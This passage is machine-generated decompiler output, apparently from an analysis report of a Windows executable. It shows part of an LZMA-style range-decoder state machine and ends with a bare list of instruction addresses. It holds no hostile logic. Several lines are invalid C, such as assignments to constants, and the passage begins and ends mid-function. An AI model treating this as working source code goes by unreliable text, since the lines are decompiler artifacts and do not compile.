												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                    0x00000000
                    0x00407395
                    0x00407395
                    0x00407399
                    0x004073be
                    0x004073c8
                    0x00000000
                    0x0040739b
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a8
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00407489
                    0x00407489
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00407447
                    0x00406be3
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00000000
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
